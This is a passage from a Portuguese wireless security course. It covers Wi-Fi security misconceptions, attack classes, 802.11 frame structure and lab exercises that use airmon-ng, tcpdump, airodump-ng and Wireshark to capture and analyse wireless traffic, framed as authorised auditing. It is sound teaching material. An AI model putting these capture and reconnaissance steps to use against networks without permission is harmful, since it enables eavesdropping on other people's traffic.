gráfica simples para auxiliar na conexão à redes Wi-Fi. Essa ferramenta simplifica o processo
de estabelecimento de conexão a uma rede Wi-Fi, podendo estar configurada com WEP,
WPA-PSK ou WPA-Enterprise.

Para utilizar o wicd é necessário verificar se o daemon wicd está em execução:

# ps ax | grep wicd

Caso o daemon não esteja em execução, execute o seguinte comando:

# wicd

A interface gráfica de manipulação do wicd é iniciada a partir do comando wicd-client ou


através do menu “Iniciar” (Application Launcher Menu), “Internet”, “Wicd Network Manager”.
A seguinte tela será aberta:

Capítulo 2 - Roteiro de Atividades

Na tela inicial do wicd é possível visualisar as redes disponíveis. Note que ao lado do SSID
existe a informação da potência do sinal, configuração de segurança e canal. Para se
conectar, escolha uma rede e clique no botão “Connect” logo abaixo o SSID da rede.

45
Caso a rede necessite de uma configuração de segurança (WEP, WPA etc), ao clicar em
conectar, a seguinte tela será exibida:

Clique em “OK” e, em seguida, no botão “Properties” logo abaixo do SSID da rede escolhida.
A seguinte tela será exibida:
Segurança em Redes sem Fio

46
Escolha o método de autenticação na caixa de seleção acima do campo “Key”. Para utili-
zação de uma chave pré-compartilhada (PSK), escolha a opção “WPA 1/2 (Preshared Key)” e
informe a chave no campo “Key”, como pode ser visto na figura a seguir:

Clique em “OK” e na tela principal do wicd, depois clique em “Connect”. A conexão será efe-
tuada e a informação do endereço IP aparecerá na barra de status do wicd, como pode ser
visto na figura a seguir:
Capítulo 2 - Roteiro de Atividades

47
l
Saiba mais
O wicd é um frontend
para os comandos
padrão de manipu-
lação de redes Wi-Fi no
Linux, como: iwconfig,
Para desconectar da rede, clique no botão “Disconnect”, abaixo do SSID da rede escolhida. iwlist, wpa_supplicant e
Se desejar que determinada rede configurada se conecte automaticamente ao iniciar o wicd, dhclient/dhcpcd.
habilite a opção “Automatically connect to this network”.
Segurança em Redes sem Fio

48
3
Auditoria em redes sem fio
(parte 1)
objetivos

Apresentar as principais classes de ataques a redes sem fio; analisar e capturar tráfego
MAC 802.11; ensinar a utilização dos analisadores de tráfego em uma WLAN.

conceitos
Principais tipos de ataques e as características da camada MAC de 802.11; captura de
tráfego e análise por meio de ferramentas como Wireshark, TCPdump e Airodump-ng.

Introdução
Estima-se que 70% dos ataques bem-sucedidos contra Access Points e clientes de q
WLANs ocorrem pelas seguintes causas (Gartner):

11 Configuração mal realizada.

11 Concepções erradas sobre segurança em redes sem fio.

11 Risco envolvido em não entender as vulnerabilidades ou assumir que a rede está


segura a priori.

Redes sem fio estão cada vez mais presentes nas empresas, casas e espaços públicos. Os
problemas de WEP, que tornaram as WLANs notórias pela insegurança, já foram sanados e
hoje existem implementações altamente seguras de WLAN. Já é hora de apontar os verda-
deiros culpados pela insegurança: os administradores.
Capítulo 3 - Auditoria em redes sem fio (parte 1)

Ataques a redes sem fio


Seja um usuário doméstico ou um administrador de uma WLAN de uma pequena empresa,
em qualquer caso é preciso considerar aspectos de segurança na configuração de um AP.
SOHO Os APs voltados para o mercado SOHO, adequados para usuários domésticos e pequenas
Small Office Home empresas, já contam com recursos de segurança suficientes para a implantação de uma
Office. Redes domés-
rede segura, ou seja: que não permita acesso não autorizado, que proteja os dados de inter-
ticas ou de pequenos
escritórios. ceptação e leitura e que impeça um atacante de inserir tráfego arbitrário.

Concepções erradas
11 “Utilizamos filtro por endereços MAC.” q
11 “WEP é melhor que nada.”

49
11 “Uso WPA-PSK e estou seguro.” q
11 “Ninguém encontrará minha rede wireless.”

11 “Ataques DoS exigem equipamentos caros, de difícil acesso.”

11 “Estamos seguros porque usamos autenticação ou criptografia.”

11 “Segregamos nossa WLAN.”

11 “Não temos redes sem fio em nossa empresa.”

11 “Temos firewall.”

11 “Ninguém nos invadiria.”

Existem diversas concepções erradas sobre segurança de redes sem fio, conferindo falsa
impressão de segurança a quem configura uma WLAN. Pode-se dizer que hoje uma WLAN
verdadeiramente segura deve contar, pelo menos, com as seguintes características:

11 Mecanismo de segurança: pelo menos WPA Personal (WPA-PSK) com uma senha forte,
preferencialmente WPA2 Enterprise (WPA2 com 802.1x e EAP);

11 Virtual Private Network (VPN): para proteger os dados entre a estação e o ponto final
da conexão, caso se queira garantir que não haja interceptação dos dados na rede de
distribuição a qual o AP é conectado;

11 Políticas de acesso e monitoração: deve-se contar com políticas que definam quem tem
e quem não tem acesso e com o monitoramento dos fluxos de acesso.

Algumas concepções erradas divulgadas na mídia e referências sobre segurança de redes


sem fio:

11 Filtro por MAC Address: filtro por endereço MAC restringe acesso em redes cabeadas,
o que não acontece em redes sem fio, uma vez que em uma rede cabeada tem-se maior
controle do meio (controlar o acesso a determinada porta do switch). Como em redes sem
fio não existe uma forma de controlar o acesso ao meio, fica mais fácil descobrir quais
endereços MAC estão liberados e alterar o endereço MAC é trivial, em Linux ou Windows;

11 WEP: WEP 40 bits pode ser quebrado em questão de minutos; o de 128 bits leva um
pouco mais de tempo. A quebra depende de vários fatores, entre eles a quantidade de
colisões (repetição de IV) e quantidade de tráfego coletada;

11 WPA-PSK: esse tipo de rede também é vulnerável a ataques de dicionário, bastando


a captura da fase de handshaking de 4 vias (EAPOL). O uso de senhas fortes é reco-
mendado, tal como ocorre em diversas aplicações com acesso autorizado mediante a
apresentação de senha;

11 Ninguém encontrará minha rede: qualquer cliente dentro do alcance do seu AP pode
enxergar o tráfego de sua rede e, com isso, avaliar a possibilidade de ataque. Muitos
administradores têm a visão de rede sem fio que o Windows oferece e, sob a plataforma
Linux, é possível visualizar qualquer tipo de tráfego, mesmo em canais incomuns (como
Segurança em Redes sem Fio

12 e 14). Mesmo que a rede esteja configurada para não fazer broadcast de SSID, ainda
assim, se houver tráfego de dados na rede, é possível descobrir o SSID com ferramentas
como o airodump-ng e kismet;

11 Ataques DoS: ataques de negação de serviço são simples e baratos em uma WLAN. Ferra-
mentas como Void11, em conjunto com uma interface de rede com chipset Prism, ou mdk3
para chipsets Atheros ou Ralink, são suficientes para conduzir um ataque bem-sucedido;

50
11 Autenticação ou criptografia: usar criptografia e autenticação não protege a rede auto-
maticamente. Há fraquezas tanto em criptografia quanto em autenticação, e por isso é
importante conhecer os riscos de cada conjunto de soluções;

11 Segregação: segregar simplesmente não elimina os riscos, já que podem ser exploradas
vulnerabilidades de aplicação ou mesmo no cliente VPN;

11 Não existem redes sem fio: para afirmar que não há redes sem fio, sua organização
deve ter políticas em operação, bem como auditá-las;

11 Firewall: basta um AP rogue mal configurado (intencionalmente ou não) próximo a uma janela
para que o perímetro do seu firewall se estenda. O conceito de perímetro deve ser revisto;

11 Ninguém nos invadiria: os motivos de se invadir uma WLAN podem ser vários, do
simples acesso gratuito à ponte a ataques diversos. Não subestime o valor de sua rede.

Segurança física
11 Não há segurança física. q
11 Conter a abrangência de uma rede sem fio é muito difícil.

11 Lugares de ataque mais comuns: prédios vizinhos, apartamentos vizinhos e lobbies.

11 Vazamento de sinal.

22 Qualidade para capturar sinal – longa distância.

22 Qualidade para associação – curta distância.

É importante que o administrador de uma WLAN tenha um fato em mente: não há segurança
física em redes sem fio.

Em redes cabeadas era necessário o acesso físico – ou seja, passar por portões, portas,
controle por crachá, seguranças e chaves para obter acesso a um ponto de rede. Em redes
sem fio, o ponto de rede é o ar, literalmente. O controle de acesso de uma WLAN tem mais
relação com o mecanismo de segurança do que com o controle da abrangência da rede.

Qualquer mudança no ambiente pode causar vazamento de sinal da WLAN, desde a simples
retirada de um móvel até a instalação de divisórias.

Wardriving
11 Termo cunhado por Peter Shipley em 1999. q
11 Busca por redes sem segurança.

11 Wardialing: popularizado pelo filme War Games (1983).


Capítulo 3 - Auditoria em redes sem fio (parte 1)

11 DEFCON 9 (2001):

22 Maior conferência hacker do mundo.

11 Segurança de redes sem fio, tema recorrente em conferências hacker.

War Games (1983) é o nome de um filme que influenciou, em alguns pontos, a cultura da
segurança computacional. Termos como firewall e backdoor eram novidade em 1983:

11 Wardialing: nome dado à discagem para números aleatórios em busca de um compu-


tador com modem, mostrada em uma cena do filme;

11 DEFCON: Defense Condition, sigla do exército norte-americano para a condição de


defesa da América do Norte. Temos desde DEFCON 5, para tempos de paz, até DEFCON 1,
para prontidão máxima das Forças Armadas.

51
Piggybacking
11 Termo em inglês para conexão em redes sem fio alheias. q
11 Prática comum entre vizinhos e viajantes.

11 “Eu não acho que isto seja roubar.”

11 Consenso: se o dono do AP habilitou segurança (mesmo WEP), então não quer


conexões de estranhos.

11 Outros problemas:

22 Uso para golpes na internet e para pedofilia – assinante do serviço é o culpado


aparente.

22 Cotas de download – prejuízo financeiro para o vizinho.

O roubo de serviços não é novidade: há muito tempo se rouba energia elétrica e TV a cabo,
por exemplo. Com redes sem fio não é diferente.

É muito comum que, em áreas urbanas densas de grandes cidades, diversas redes sem fio

l
estejam disponíveis. Nesse cenário, a proximidade entre apartamentos, salas comerciais e
outros espaços de coabitação permite que uma pessoa use a rede aberta inadvertidamente.
Saiba mais sobre
De certa forma, o culpado por essa prática é quem configura o AP: quem pratica piggybacking piggyback no artigo
prefere redes fáceis de se conectar a redes com mecanismos de segurança configurados. “Hey neighbor, stop
piggybacking on my
Embora esse fato não justifique este tipo de prática, é difícil concordar com a indignação
wireless”, The New York
de um proprietário de AP que não se deu ao trabalho de trocar a senha-padrão. Clientes Times: http://www.
Windows, por exemplo, podem perfeitamente fazer piggybacking sem perceber ao encontrar nytimes.com
uma rede com mesmo nome (SSID) de sua rede preferencial.

Warflying
Sinais de rádio podem se propagar de maneira imprevisível. q
Warflying Tom Hardware’s Guide (2004).

11 1.433 APs, 1.053 sem criptografia.

Figura 3.1
Warflying.
Segurança em Redes sem Fio

Como já afirmamos anteriormente, o termo wardialing deu origem a diversos outros


termos, notadamente wardriving. Alguns pesquisadores, entretanto, se interessaram em
capturar redes a partir de um avião, o que prova que a propagação do sinal RF é de fato
imprevisível. A experiência de warflying do site Tom Hardware’s Guide (2004) foi a mais
notória, mas não foi a primeira.

52
DEFCON Wifi Shootout Contest
11 Quase 125 milhas (~200 Km) na edição 2005. q
11 Link 802.11b sem amplificação do sinal, PCMCIA Z-Com XI-325 HP+ 802.11b 300 mW
(24.7 dBm).

Figura 3.2 A conferência hacker DEFCON, que acontece anualmente em Las Vegas (EUA) desde 1993, teve um
Wifi Shootout novo evento adicionado às suas atividades paralelas: o Wifi Shootout Contest. Nesse campeonato,
Contest/DEFCON,
equipe Team iFiber ganha quem conseguir montar uma rede Wi-Fi que transmita pela maior distância possível.
Redwire.
A equipe Team iFiber Redwire tinha membros com todo tipo de conhecimento: soldagem,
matemática, eletrônica, radioamador, programação e Linux.

w É interessante ligar esse experimento aos conceitos de radiofrequência abordados no Capítulo 1.


Mais informações sobre Contribuíram para a quebra do recorde elementos como linha de visada, ambiente livre de
o evento: 3rd Annual interferências, reflexões, entre outras peculiaridades da região de desertos de Las Vegas.
DEFCON Wifi Shootout
Contest: http://www.
wifi-shootout.com/ e Divulgação de informações
q
DEFCON WiFI Shootout
2005: http://www. 11 WLAN = LAN com hub.
unwiredadventures.
com 11 Com criptografia ou não, o tráfego pode ser capturado.

11 Não é necessário se associar ao AP para capturar.

11 Depende da combinação entre distância e ganho da antena.

Da mesma forma que uma LAN com hub, em uma WLAN temos o meio compartilhado.
Dessa forma, todos os clientes associados recebem uma cópia dos quadros da WLAN.

Existe a opção de isolar os clientes associados a um AP (variável wl0_ap_isolate do OpenWRT), Capítulo 3 - Auditoria em redes sem fio (parte 1)
mas isso ocorre somente no nível da camada 3, ou seja, no encaminhamento de pacotes.

Na prática deste curso, os alunos terão a oportunidade de capturar tráfego e analisá-lo com
as ferramentas Wireshark e Kismet.

Negação de serviço
Denial of Service (DoS). q
Três categorias:

11 Ataques ao meio: RF Jamming.

11 Fraquezas de 802.11: ataques deauth.

11 Vulnerabilidades no firmware dos clientes.

Segurança = Confidencialidade, Integridade e Disponibilidade.

53
Denial of Service (DoS) é um jargão de segurança de redes para negação de serviço, e
constitui basicamente no fato de um serviço se tornar indisponível. No caso de uma WLAN,
clientes são impedidos de se associar a um AP por ação de um atacante. O próprio IEEE
assume que uma WLAN é vulnerável por natureza a ataques de negação de serviço por RF
Jamming, motivo da ausência de mecanismos de proteção contra este tipo de ataque.

No roteiro de atividades do Capítulo 5, os alunos terão a oportunidade de experimentar


comandos com ataques que forçam a “desautenticação” de clientes: uma forma de DoS, portanto.

Access points rogue


11 Usuários bem intencionados ligam APs mal configurados à rede cabeada. q
11 Mudança inadvertida no perímetro da rede.

11 Firewall corporativo defende do lado errado.

11 Soluções:

22 Políticas.

22 Monitoramento.

22 Auditoria.

Access points rogue representam uma das principais ameaças a redes sem fio. Podem ser
plantados em uma empresa tanto por usuários desavisados quanto por um atacante que
deseja ter acesso à sua rede sem ser notado.

Um AP típico, que exerce o papel de gateway, oferece os serviços de DHCP, para alocação
dinâmica de endereços, e de NAT, para o compartilhamento de um endereço IP entre vários
clientes do AP. Nesse cenário, um usuário que conecte seu AP ao ponto de rede da sua
estação de trabalho poderá nunca ser notado pelo administrador da rede, uma vez que até
mesmo a troca do endereço MAC da interface Ethernet que se conecta à rede cabeada é
uma prática comum. Assim, ataques que partam de clientes de um AP “rogue” aparentam
partir do ponto de rede do usuário, ou do ponto de rede não utilizado com o qual o atacante
se infiltrou na rede.

Políticas, monitoramento e auditoria são as chaves para detecção e desativação de APs


“rogue”. Uma simples cláusula na política proibindo a instalação de APs sem o conhecimento
da administração da rede não tem eficácia sem monitoração e auditoria efetivas.

Outros ataques
11 Redes domésticas e hotspots. q
11 Exploração de vulnerabilidades do sistema operacional.

11 Worms que se propagam pelas camadas PHY e MAC.

22 Filtros de camada 3 e 4 sem utilidade.


Segurança em Redes sem Fio

22 Possibilidade futura.

22 Worm Cabir em celulares Bluetooth.

Clientes podem estar sob a proteção de uma WLAN corporativa segura mas, quando se
associam a um hotspot ou a um AP doméstico, a segurança normalmente é mais branda.
O cliente fica vulnerável a ataques não necessariamente relacionados com redes sem fio,
tais como exploração de vulnerabilidades em um Sistema Operacional não atualizado ou em
uma estação sem firewall pessoal.

54
Bluetooth já mostrou ser vulnerável a ataques de worms, como se viu no caso do
worm Cabir (Bluetooth-Worm:SymbOS/Cabir: http://www.f-secure.com/). Até o
momento, worms de redes 802.11 são apenas uma possibilidade futura, mas é impor-
tante levar esse risco em consideração.

Tráfego 802.11
11 WLAN usa enquadramento 802.11 e 802.2 – Logical Link Control (LLC). q
11 Ethernet: tráfego 802.3.

11 Camada MAC:

22 Mecanismos de acesso.

22 Suporte à fragmentação.

22 Entrega confiável de pacotes.

22 Separação de redes por BSSID.

22 Privacidade com WEP.

22 Gerenciamento de energia.

Neste capítulo será apresentada uma visão geral da camada MAC de 802.11, com a descrição
dos principais campos dos quadros, entre outros conceitos importantes. No roteiro de ativi-
dades práticas deste capítulo, serão exercitadas a captura e a análise de tráfego.

A camada MAC é especificada na ISO/IEC 8802-11:1999. As placas de rede atuais não per-
mitem operação em full-duplex com apenas um transmissor, não sendo possível implantar
Carrier Sense Multiple Access (CSMA) ou Collision Avoidance ou (CA). Além disso, não é
possível uma detecção de colisões confiável em rádio, o que é resolvido pelas mensagens
Request To Send (RTS) ou Clear To Send (CTS), um mecanismo virtual de sensibilidade ao
sinal da portadora.

11 Fragmentação: pouco usada na prática, possibilita sinal de tráfego malicioso dividido


em vários quadros. Em 802.11, a Maximum Transmission Unit (MTU) é de 2.300 bytes,
enquanto em Ethernet, por default, é de 1.500 bytes.

11 Confiabilidade: o recebimento de cada pacote de dados é reconhecido como mais confiável,


embora implique em mais overhead, já que dois pacotes são trocados antes que se possa
efetivamente transmitir.

11 Wired Equivalent Privacy (WEP): confidencialidade dos dados trocados, será assunto do
Capítulo 3 - Auditoria em redes sem fio (parte 1)

Capítulo 6.

11 Basic Service Set Identifier (BSSID): endereço único de 48 bits que identifica de maneira
única um AP e um conjunto de estações sem fio (STA).

Economia de energia também é considerada nessa especificação, de forma que o consumo


de energia seja compatível com dispositivos móveis, como um Personal Digital Assistant
(PDA) e laptops.

Arquitetura IBSS
11 Independent Basic Service Set network q
11 Peer to peer (ad-hoc).

11 Aplicações: troca de arquivos, algumas implementações de redes mesh baseadas


em 802.11.
55
Infraestrutura: q
11 Figura do Access Point (AP).

11 Funções típicas: segurança, ponto central de acesso à rede de distribuição.

Implementações de redes de infraestrutura:

11 Basic Service Set (BSS): agrupamento de uma ou mais estações e um AP.

11 Extended Service Set (ESS): múltiplas redes BSS que compartilham um mesmo ESS,
permitindo roaming entre APs.

11 WDS: relay entre dois APs, podendo ser utilizado para ligar duas redes cabeadas através
de uma rede sem fio.

802.1x
11 Autenticação. q
11 Controle de acesso baseado em portas.

11 Autenticação antes do acesso às portas solicitado pelo Supplicant.

11 Apenas tráfego EAP (EAP Over Lan – EAPOL) é permitido antes da conclusão
da autenticação.

11 Authenticator (normalmente AP) repassa as mensagens EAP para o Authentication


Server (RADIUS).

Extensible Authentication Protocol (EAP) é um protocolo de transporte para autenticação, e não


o método de autenticação em si. Os tipos de EAP definem como as credenciais são trocadas.

Alguns métodos estão relacionados a seguir, enquanto a lista completa encontra-se dispo-
nível no site da IANA. Abordaremos EAP com mais detalhes nos Capítulos 9 e 10, em que
projetaremos e implantaremos uma rede segura baseada em métodos EAP e EAPOL.

11 EAP-MD5;

11 LEAP (Lightweight EAP);

11 EAP-TLS;

11 EAP-TTLS;

11 PEAP (Protected EAP);

11 EAP-MSCHAPv2.
Segurança em Redes sem Fio

56
Servidor de autenticação
(RADIUS)
Rede sem fio

2
Au
thenticator
Figura 3.3
Conceitos do 1
802.1x: requerente,
autenticador, rede Internet ou outros
sem fio, servidor
recursos LAN
de autenticação e
3
internet ou outros Supplicant
recursos de rede.

IEEE 802.11
Três tipos: q
11 Management: Beacons, probes e autenticação.

11 Control: reconhecimento de recebimento de pacotes.


w Data:
Saiba mais sobre o EAP
em http://www.iana.org. 11 Encapsula dados do usuário (como IP e ARP).

11 Únicos pacotes com aplicação de criptografia.

Octetos: 2 2 6 6 6 2 6 0-2312 4

Frame Duration Sequence Frame


Address 1 Address 2 Address 3 Address 4 FSC
Control / ID Control Body

Cabeçalho MAC

Capítulo 3 - Auditoria em redes sem fio (parte 1)

Protocol To From More Pwr More


Type Subtype Retry WEP Order
Version Ds Ds Frag Mgt Data

Bits: 2 2 4 1 1 1 1 1 1 1 1

Figura 3.4 Campos do cabeçalho 802.11:


Quadros 802.11 –
Cabeçalho. 11 Frame Control (FC);

11 Duration/ID;

11 Address 1;

11 Address 2;

11 Address 3;

57
11 Sequence Control;

11 Address 4;

11 Data: o tamanho máximo do campo de dados antes de qualquer criptografia é de 2.304 bytes,
mas o payload real depende do tipo de criptografia aplicada.

2.312 bytes para WEP: adiciona 4 bytes.

2.324 bytes para TKIP (WPA): adiciona 20 bytes.

2.320 bytes para CCMP (WPA2): adiciona 16 bytes.

11 Frame Check Sequence (FCS): CRC para verificação de integridade.

11 2 bytes (16 bits), 11 opções. q


11 Especifica se o quadro é de gerenciamento, dados ou controle.

11 Determina o formato do restante do quadro.

Protocol To From More Pwr More


Type Subtype Retry WEP Order
Version Ds Ds Frag Mgt Data

Bits: 2 2 4 1 1 1 1 1 1 1 1

11 Protocol Version (2 bits): número do protocolo; na prática, o valor é sempre 0 (zero). Figura 3.5
Quadros 802.11 –
11 Type (2 bits): especifica se é um quadro de gerenciamento, controle ou dados. O campo Frame Control (FC).
Subtype (4 bits) especifica subtipos de quadros de controle, gerenciamento ou dados.
A lista completa com as 26 combinações de type ou subtype pode ser encontrada na seção
7.1.3.1 do documento ANSI/IEEE Std 802.11. Alguns exemplos:

22 00/0000: Management, Association Request.

22 00/0100: Management, Probe Request.

22 00/1000: Management, Beacon (informações para associação).

22 00/1101-1111: Management, Reservado.

22 01/1011: Control, RTS.

22 01/1100: Control, CTS.

Os 8 bits restantes são usados para ativar ou desativar opções:

11 To DS: ativado quando o quadro possui o sistema de distribuição como destino, normal-
mente representado pelo AP;

11 From DS: ativado quando tem como origem o sistema de distribuição;

11 More Frag: ativado no caso de existirem mais fragmentos do quadro na sequência;

11 Retry: ativado quando o quadro é uma retransmissão;

11 Power Mgmt: ativado para notificar que a estação encontra-se em modo de economia
Segurança em Redes sem Fio

de energia;

11 More Data: ativado quando a estação avisa que saiu do estado de economia de energia;

11 WEP: ativado quando WEP está habilitado no Basic Service Set (BSS), agrupamento de
estações (STA) e um AP;

11 Strict Order: quando ativado, determina que os quadros devem ser recebidos na sequência
em que foram enviados; caso contrário, devem ser descartados.

58
Quadros 802.11
Demais campos. q
Duration/ID:

11 Tempo estimado de ocupação do meio para uma transmissão de dados.

11 Sequence control.

22 Fragmentação para frames de dados e gerenciamento.

22 Quando o payload é maior que 2312 bytes.

22 4097 iterações (0-4096).

22 Pouco usado.

11 Frame Check Sequence (FCS).

22 Verificação da integridade do quadro no recebimento por CRC 32.

Quadros de gerenciamento:

11 Dados de gerenciamento montados no payload.

11 Campos:

22 Fixed Parameters.

33 BSS Timestamp, Intervalo de beacon e capability information.

22 Tagged Parameters:

33 Tag Number, Tag Lengh e Tag.

33 Exemplo: SSID ESR: 0, 03, 45 83 82.

33 Outros Tag numbers: Supported Rates (1) e Canal/DS Parameter set (11).

Análise – Flags “To DS” e “From DS” (Frame Control):

11 To DS ativado – Origem em uma estação sem fio.

22 Endereços: MAC Destino, BSSID, MAC Origem.

11 From DS ativado: origem na rede cabeada (AP).

22 Endereços: MAC BSSID, Origem, MAC Destino.

11 Ambos ativados: Wireless Distribution System (WDS).

22 Endereços: Receptor, Transmissor, MAC Destino e MAC Origem.

22 4º endereço (MAC Origem) existe somente nesse caso e depois do campo


Sequence Control. Capítulo 3 - Auditoria em redes sem fio (parte 1)

11 Ambos desativados: rede ad-hoc.

22 Endereços: MAC Destino, MAC Origem e BSSID.

Captura
11 Ethernet utiliza enquadramento IEEE 802.3. q
11 WLAN: 802.11 + sub-header 802.2 (Logical Link Control – LLC).

11 O tipo de tráfego depende do modo de operação da interface de rede.

11 Captura em modo cliente (managed) mostra tráfego aparentemente de Ethernet.

59
Modos de operação das interfaces de rede
Managed: q
11 Mais comum, associação a um Access Point (rede BSS).

11 Captura mostra tráfego de uma rede Ethernet (802.3).

11 A captura de pacotes é feita somente quando o cliente que a efetua está associado.

11 Revela poucos dados sobre a rede para um auditor.

Monitor:

11 Chamada também de RFMON.

11 Captura quadros no formato em que foram enviados (802.11+ 802.2).

11 Revela tráfego de gerenciamento:

11 quadros de dados, gerenciamento e controle.

11 Não é necessária a associação.

11 Depende de drivers (

11 comum em Linux, limitado em Windows).

11 Captura em um canal por vez.

Master:

11 Access Point.

11 Permite a criação de um Access Point baseado em uma estação.

Ad-hoc:

11 Redes IBSS ponto-a-ponto.

A captura em modo monitor é a mais interessante para o auditor. Da mesma forma que
captura qualquer tipo de tráfego da rede, permite que o auditor fique “invisível” aos Access
Points, ou seja, não transmite pacotes para conduzir a auditoria.

Esse tipo de captura infelizmente tem algumas limitações, entre elas:

11 Não permite que a interface se associe a um AP, isto é, em modo monitor a interface
somente é capaz de capturar pacotes;

11 Em sistemas Windows é possível somente com hardware e software especiais;

11 Captura um canal por vez; enquanto a interface captura em um canal, todos os outros
não estão sendo monitorados. A solução para esse problema seria o uso de pelo menos
11 interfaces de rede simultâneas, cada uma delas monitorando um canal distinto. Outra
solução, mais viável, é implementada em softwares de auditoria como airodump-ng e
kismet. Trata-se do channel hopping, uma técnica que configura a interface em um canal
por alguns segundos e vai alternando sequencialmente entre os canais disponíveis, moni-
torando assim todo o espectro disponível.
Segurança em Redes sem Fio

60
Roteiro de Atividades 3
Atividade 3.1 – Captura e análise de tráfego em sistemas Windows
Neste exercício você verá, na prática, quais são as diferenças entre as capturas de tráfego
de sistemas Windows e Linux. Começaremos pelo sistema Windows, que apresenta mais
limitações. Localize e execute o utilitário Wireshark em sua estação.

1. Execute o utilitário, e depois selecione o menu “Capture” > “Options”.

Capítulo 3 - Roteiro de Atividades

Figura 3.6
Wireshark.

Na janela anterior, você iniciará duas capturas diferentes: uma com a opção “Capture
packets in promiscuous mode” marcada; e outra com a mesma opção desmarcada.

O que aconteceu em cada um dos experimentos? Como é o funcionamento de uma interface


Ethernet em modo promíscuo e como você esperava que fosse o comportamento desse
modo na interface 802.11?

61
2. Repita o experimento anterior, depois de ter associado o cliente a um AP. Provoque algum
tipo de tráfego (HTTP, ICMP etc.) e observe qual tipo de tráfego o Wireshark captura com
e sem a opção “promiscuous” marcada. O que você notou de diferente nessa experiência?

A essa altura do experimento, você já deve ter constatado que só é possível capturar tráfego
da interface WLAN quando o cliente está associado. E não é só isso: apenas tráfego desti-
nado a broadcast e à própria interface é capturado, ou seja, uma vez associada à interface
802.11, para Wireshark não há diferença em relação a uma interface Ethernet. Note ainda
que a captura ocorre em apenas um canal: o canal da rede à qual o cliente se associou.

Atividade 3.2 – Captura e análise de tráfego em sistemas Linux


Agora que você constatou que a captura de tráfego 802.11 é limitada em sistemas Windows,
você está pronto para comparar os dois sistemas.

Capturando tráfego
Revendo os conceitos do Roteiro de Atividades 2, certifique-se de que a interface WLAN
está instalada e ativa. Agora você irá configurar a interface em modo Monitor. Nesse modo,
a interface é capaz de capturar não apenas quadros (pacotes da camada MAC) de dados,
como também de controle e gerenciamento.

Para começar a explorar esse novo universo de captura de tráfego, iniciaremos configu-
rando a interface de rede. A interface que temos em nosso laboratório é Ralink; por isso
usaremos wlan0 como nome do dispositivo. Para ativar a interface em modo monitor,
utilizaremos um script do pacote aircrack-ng, que simplifica esse processo executando os
comandos iwconfig e iwpriv com os parâmetros necessários para cada driver:

# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)

Alguns drivers como os dos chipset Atheros e Ralink suportam a criação de interfaces vir-
tuais e essa característica permite que em uma única interface física, seja possível criar uma
interface virtual em modo monitor e manter outra interface virtual em modo Managed. Com
isso, pode-se por exemplo capturar e injetar pacotes em uma mesma interface física.

Após executar esse comando, é criada uma interface (mon0 no nosso caso), que permite a
captura de qualquer tipo de quadro 802.11 (gerenciamento, controle e dados), mas impõe
duas limitações: a captura acontece em apenas um canal por vez e, enquanto a interface
estiver nesse modo, não é capaz de se associar a uma rede (interface em modo Managed).
Assim, o valor do SSID é irrelevante para uma interface nesse modo de operação.
Segurança em Redes sem Fio

Um parâmetro que pode ser passado para o comando airmon-ng é o canal que deseja moni-
torar. Isso pode ser feito através do comando airmon-ng no momento de sua primeira exe-
cução ou com o comando iwconfig após a execução do airmon-ng. Caso não seja passado o
parâmetro do canal para o airmon-ng, a interface estará apta para realizar channel hopping.

62
Exemplos:

# airmon-ng start wlan0 2

ou

# iwconfig mon0 channel 2

Capturar tráfego em Linux com a interface em modo Managed é o mesmo que capturar
em sistemas Windows, ou seja, é necessário que haja associação. Para capturar em modo
Monitor, basta iniciar algum utilitário de captura; usaremos TCPdump como exemplo:

# tcpdump –i mon0 –s 65535 –n –w captura-monitor.pcap

Com esse comando, todo o tráfego será capturado e salvo no arquivo captura-monitor.pcap.
O formato dos arquivos gerados pelo TCPdump é compatível com Wireshark.

Outra forma de capturar o tráfego IEEE 802.11 é através do aplicativo Airodump-ng, que faz
parte do pacote aircrack-ng.

Nesta atividade vamos capturar tráfego no canal 6, assim configure a interface em modo
monitor no canal 6.

# airmon-ng start wlan0 6

ou

# iwconfig mon0 channel 6

Memorize esse aspecto dos canais. Ele será essencial nas capturas de tráfego das práticas
de WEP e WPA.

Capture os pacotes 802.11 e os salve no arquivo teste-01.cap. Se você repetir o comando sem
apagar teste-01.cap, será criado um novo arquivo (teste-02.cap). Para especificar um canal,
utilize o parâmetro --channel do airodump-ng:

# airodump-ng –w teste mon0 --channel 6

CH 6 ][ Elapsed: 0 s ][ 2008-10-01 01:37

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH


ESSID

00:16:B6:xx:xx:xx 1 0 1 0 0 6 48 WEP WEP Soluciones


00:1C:10:32:xx:xx 2 0 10 1 0 6 48 WPA TKIP PSK ap1
Capítulo 3 - Roteiro de Atividades

00:1C:10:C5:xx:xx 57 100 17 6 0 6 48 WPA TKIP PSK ap2

BSSID STATION PWR Rate Lost Packets Probes

(not associated) 00:21:5D:xx:xx:xx 2 0- 1 0 5 homeap1

(not associated) 00:1C:BF:xx:xx:xx 37 0- 1 11 7 homeap2

00:1C:10:xx:xx:xx 00:1E:52:xx:xx:xx 65 54-48 0 6

63
Analisando tráfego
Agora, é hora de abrir o arquivo salvo no exercício anterior e, para tanto, usaremos o utili-
tário Wireshark, por se tratar de um software que possui uma apresentação mais didática
dos pacotes.

Figura 3.7
Opções de captura
do Wireshark.
Com base no que foi aprendido na parte teórica, use o analisador de tráfego Wireshark para
selecionar pelo menos dois subtipos de cada tipo de quadro:

11 Quadros de Gerenciamento: Beacons, Probe Requests, Probe Responses, Deauthentication,


Authentication, Association Request, Association Response etc.;

11 Quadros de Controle: RTS, CTS, ACK;

11 Quadros de Dados.

Use display filters do Wireshark para selecionar esses quadros específicos. Explique brevemente
a função do subtipo selecionado. A seguir, alguns tipos de filtros que podem ser utilizados:

data (pacotes de dados)

wlan.fc.wep = 1 (pacotes com WEP habilitados)

wlan.mgt.fixed.beacon (pacotes com beacons)

wlan.fc.type_subtype = 8 (beacons)

frame contains “string” (pacotes com determinada string)

wlan.sa! = MAC (pacotes de determinado endereço MAC)


Segurança em Redes sem Fio

64
Atividade 3.3 – Vazamento de informações em redes Wi-Fi
Cenário: você é um analista de segurança e deseja provar a vulnerabilidade de uma rede Wi-Fi
sem criptografia. Para isso, solicita à diretoria permissão para realizar uma auditoria na rede,
com o intuito de provar que dados sigilosos podem ser obtidos com muita facilidade por qual-
quer usuário que tenha conhecimento em ferramentas de análise de redes Wi-Fi.

